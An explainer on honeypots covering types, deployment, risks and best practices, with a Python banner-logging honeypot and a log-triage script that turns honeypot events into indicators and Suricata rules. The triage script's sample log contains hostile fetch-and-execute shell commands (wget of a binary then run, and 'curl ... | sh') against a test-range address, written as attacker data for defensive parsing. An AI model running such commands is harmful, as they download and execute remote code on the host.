What is a honeypot?


A honeypot is a deliberately deployed decoy system, service, or data asset that appears legitimate and vulnerable so it will attract attackers. It’s isolated and closely monitored so defenders can detect, observe, and analyze malicious activity without risking production systems.

Key points

  • Purpose
    • Detect attacks early and generate alerts.
    • Collect intelligence about attacker techniques, tools, and indicators of compromise (IOCs).
    • Divert attackers away from real assets (in production use).
    • Support research, threat hunting, and security team training.
  • Types (by interaction)
    • Low-interaction: Emulates specific services/protocols (easy to deploy, low risk because nothing real sits behind the emulation, limited telemetry).
    • Medium-interaction: Offers more realistic service behavior and richer logs.
    • High-interaction: Real systems/services that allow attackers to fully interact (maximal intelligence but higher risk and maintenance).
  • Types (by purpose)
    • Production honeypots: Lightweight, placed in business networks to detect opportunistic attackers.
    • Research honeypots: More complex, used by researchers to study attacker behavior and malware.
  • Deployment architectures
    • Host-based: A decoy machine running services (SSH, web, databases).
    • Network-based: Simulated networks/services responding to network probes.
    • Canary tokens: Small tripwires (URLs, files, credentials) that alert when accessed.
  • Data collected
    • Connection metadata, commands executed, malware samples, exploit payloads, attacker IPs, timing and patterns of activity.
  • Benefits
    • High signal-to-noise detection: no legitimate user or process has a reason to touch a decoy, so nearly every contact is a scan or an attack (the usual false positives are your own vulnerability scanners and asset-inventory tools, which should be allow-listed).
    • Detailed forensic and behavioral telemetry.
    • Improves IDS/IPS signatures and incident response playbooks.
  • Risks and limitations
    • If not properly isolated, an attacker could pivot from a honeypot to real systems, or use it as a launch point to attack third parties.
    • High-interaction honeypots require significant maintenance and monitoring.
    • Attackers may fingerprint a honeypot (default banners, missing uptime or shell history, unrealistic file systems) and avoid it or feed it misleading activity, reducing its value.
    • Legal/ethical considerations: check local laws and policies. Deploying a decoy is generally not entrapment, but captured sessions can contain third-party credentials and personal data, so define retention and handling rules before collecting them.
  • Common tools/examples
    • Cowrie (SSH/Telnet honeypot), Dionaea (malware capture), Honeyd (network emulation), Thinkst Canary/Canarytokens (easy deployment), MHN (Modern Honey Network, sensor management) and commercial deception appliances.
  • Best practices
    • Isolate the honeypot (its own VLAN or VM network, deny-by-default egress) so a compromised decoy cannot reach production or attack third parties.
    • Ship logs off the honeypot in real time to a central collector; an attacker who controls the decoy can tamper with anything stored locally.
    • Monitor and alert in real time.
    • Snapshot the decoy so it can be reverted to a known-clean state after each compromise; keep the host, hypervisor and monitoring stack patched even though the decoy services themselves are meant to look vulnerable.
    • Define legal/compliance rules and notify stakeholders.
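
The following is added here as a worked example; it is not the page's own code and not a sample from Cowrie or any other tool named above. It is a minimal low-interaction honeypot in Python: a TCP listener that sends an SSH-style banner, records the first bytes each client sends, and writes one structured event per connection, which is the shape of telemetry the "Data collected" section describes. The banner string, the sensor name "ssh-lowint", the event field names and the JSON-lines sink are assumptions for illustration.

```python
"""Minimal low-interaction honeypot: a TCP listener that presents an SSH-style
banner, captures each client's first bytes, and logs one event per connection."""
import json
import socket
import threading
import time
from datetime import datetime, timezone

# Assumed banner; match it to nearby real hosts so fingerprinting does not single it out.
BANNER = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6\r\n"
READ_TIMEOUT = 2.0    # seconds to wait for the client's first bytes
MAX_CAPTURE = 512     # bytes kept per connection; enough for a banner or probe


def build_event(peer, received, started):
    """One connection -> one structured, JSON-serialisable event."""
    return {
        "ts": datetime.fromtimestamp(started, timezone.utc).isoformat(),
        "sensor": "ssh-lowint",          # assumed sensor name
        "src_ip": peer[0],
        "src_port": peer[1],
        "bytes_received": len(received),
        "client_banner": received.split(b"\r\n", 1)[0].decode("utf-8", "replace"),
        "is_probe": received == b"",     # connected, sent nothing: a scan
    }


class Honeypot:
    """Accept, send banner, capture first bytes, log; never opens outbound connections."""

    def __init__(self, host="127.0.0.1", port=0, sink=None):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))     # port=0: the OS picks a free port
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]
        self.events = []                 # in-memory log
        self.sink = sink                 # optional JSON-lines file to append to
        self._lock = threading.Lock()
        self._stop = threading.Event()

    def _handle(self, conn, peer):
        started, received = time.time(), b""
        try:
            conn.sendall(BANNER)
            conn.settimeout(READ_TIMEOUT)
            received = conn.recv(MAX_CAPTURE)
        except OSError:                  # timeouts and resets are routine here
            pass
        finally:
            conn.close()
        event = build_event(peer, received, started)
        with self._lock:
            self.events.append(event)
            if self.sink:
                with open(self.sink, "a", encoding="utf-8") as fh:
                    fh.write(json.dumps(event) + "\n")

    def _serve(self):
        self.sock.settimeout(0.2)        # so stop() is noticed promptly
        while not self._stop.is_set():
            try:
                conn, peer = self.sock.accept()
            except socket.timeout:
                continue
            threading.Thread(target=self._handle, args=(conn, peer), daemon=True).start()
        self.sock.close()

    def start(self):
        threading.Thread(target=self._serve, daemon=True).start()
        return self

    def stop(self):
        self._stop.set()

    def wait_for_events(self, n, timeout=5.0):
        deadline = time.time() + timeout
        while True:
            with self._lock:
                if len(self.events) >= n or time.time() >= deadline:
                    return list(self.events)
            time.sleep(0.05)


def probe(port, payload=b""):
    """Client helper: connect, read the banner, optionally send bytes, close."""
    with socket.create_connection(("127.0.0.1", port), timeout=2) as c:
        banner = c.recv(256)
        if payload:
            c.sendall(payload)
    return banner


if __name__ == "__main__":
    hp = Honeypot(port=0).start()        # a real deployment binds e.g. 2222 (assumed) with a redirect from 22
    probe(hp.port, b"SSH-2.0-OpenSSH_8.9\r\n")   # a client that speaks
    probe(hp.port)                               # a scanner that only connects
    print("\n".join(json.dumps(ev) for ev in hp.wait_for_events(2)))
```

In a deployment, bind on an interface inside the isolated honeypot segment rather than 127.0.0.1, point sink at a file your log shipper forwards off-box, and keep the host's egress policy at deny-all: the listener never initiates traffic, so nothing legitimate is lost. Because no real service sits behind the banner, the worst an attacker can do is fill the log, which is exactly the point of a low-interaction design.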

When to use one

  • When you want high-confidence detection of adversary activity, need malware samples or attacker TTPs, or want an early-warning system for opportunistic scanning and exploitation attempts.
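
Once a decoy is producing events, the defender's next step is to triage them into indicators and detection content, which is where the "Data collected", "Benefits" and "When to use one" points above pay off. The Python below is an added example, not code from the page or from Cowrie, MHN or any other tool named above. Its JSON-lines event format and the sample log it parses are constructed for illustration (loosely modelled on how session-recording honeypots log connects, login attempts and commands), the addresses are RFC 5737 test ranges, and the Suricata sid range and message text are arbitrary choices of this example.

```python
"""Triage of honeypot event logs: pull indicators (source IPs, credentials,
commands, payload URLs) from JSON-lines events and turn the sources into
Suricata rules. Added example; the event shape is this example's own."""
import json
import re
from collections import Counter, defaultdict

# Constructed sample log (JSON lines); addresses are RFC 5737 test ranges.
SAMPLE_LOG = """\
{"ts":"2024-05-01T02:11:04Z","event":"session.connect","session":"a1","src_ip":"203.0.113.7"}
{"ts":"2024-05-01T02:11:05Z","event":"login.failed","session":"a1","src_ip":"203.0.113.7","username":"root","password":"123456"}
{"ts":"2024-05-01T02:11:06Z","event":"login.success","session":"a1","src_ip":"203.0.113.7","username":"root","password":"admin"}
{"ts":"2024-05-01T02:11:09Z","event":"command.input","session":"a1","src_ip":"203.0.113.7","input":"cd /tmp; wget http://198.51.100.9/x86.bin -O .x; chmod +x .x; ./.x"}
{"ts":"2024-05-01T02:11:10Z","event":"command.input","session":"a1","src_ip":"203.0.113.7","input":"curl -s https://198.51.100.9/stage2.sh | sh"}
{"ts":"2024-05-01T02:13:40Z","event":"session.connect","session":"b2","src_ip":"203.0.113.42"}
{"ts":"2024-05-01T02:13:41Z","event":"session.closed","session":"b2","src_ip":"203.0.113.42"}
this line is not json and must not abort the parse
{"ts":"2024-05-01T02:15:00Z","event":"login.failed","session":"c3","src_ip":"203.0.113.7","username":"admin","password":"admin"}
"""

URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\";|&<>]+")
LOGIN_EVENTS = {"login.failed", "login.success"}


def parse_events(text):
    """Parse JSON lines; skip (but count) lines that are not usable events."""
    events, bad = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            bad += 1
            continue
        if isinstance(obj, dict) and "event" in obj and "src_ip" in obj:
            events.append(obj)
        else:
            bad += 1
    return events, bad


def extract_iocs(events):
    """Group indicators by type. Any contact with a decoy is suspect, so even
    connect-only sessions contribute their source address."""
    iocs = {
        "src_ips": Counter(),            # ip -> number of events
        "credentials": Counter(),        # (user, password) -> attempts
        "successful_logins": set(),      # credentials the decoy accepted
        "commands": [],
        "payload_urls": set(),           # URLs fetched inside commands
    }
    for ev in events:
        iocs["src_ips"][ev["src_ip"]] += 1
        kind = ev["event"]
        if kind in LOGIN_EVENTS:
            cred = (ev.get("username", ""), ev.get("password", ""))
            iocs["credentials"][cred] += 1
            if kind == "login.success":
                iocs["successful_logins"].add(cred)
        elif kind == "command.input":
            cmd = ev.get("input", "")
            iocs["commands"].append(cmd)
            iocs["payload_urls"].update(URL_RE.findall(cmd))
    return iocs


def classify_sources(events):
    """Split sources into scanners (connect only) and interactive attackers."""
    kinds_by_ip = defaultdict(set)
    for ev in events:
        kinds_by_ip[ev["src_ip"]].add(ev["event"])
    interactive = {ip for ip, kinds in kinds_by_ip.items()
                   if kinds & (LOGIN_EVENTS | {"command.input"})}
    return set(kinds_by_ip) - interactive, interactive


def suricata_rules(iocs, sid_base=9000001):
    """One Suricata rule per honeypot source, busiest first. The sid range
    and msg text are this example's own choices."""
    return [
        f'alert ip {ip} any -> $HOME_NET any '
        f'(msg:"Honeypot-sourced host ({count} events)"; sid:{sid_base + n}; rev:1;)'
        for n, (ip, count) in enumerate(iocs["src_ips"].most_common())
    ]


if __name__ == "__main__":
    events, bad = parse_events(SAMPLE_LOG)
    iocs = extract_iocs(events)
    print(f"{len(events)} events parsed, {bad} line(s) skipped")
    print("payload URLs:", sorted(iocs["payload_urls"]))
    print("\n".join(suricata_rules(iocs)))
```

The split into scanners and interactive sources matters for what you do with the output: a connect-only address is worth a short-lived block or a watchlist entry, while a source that logged in and pulled a payload gives you credentials to check against your own estate, a download URL to hunt for in proxy logs, and a sample to detonate. Treat the generated rules as a starting point for the IDS/IPS tuning mentioned above, not as a permanent blocklist; honeypot sources churn quickly.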

In short: a honeypot is a monitored decoy used to lure attackers so defenders can detect, analyze, and respond to malicious activity while protecting real assets.
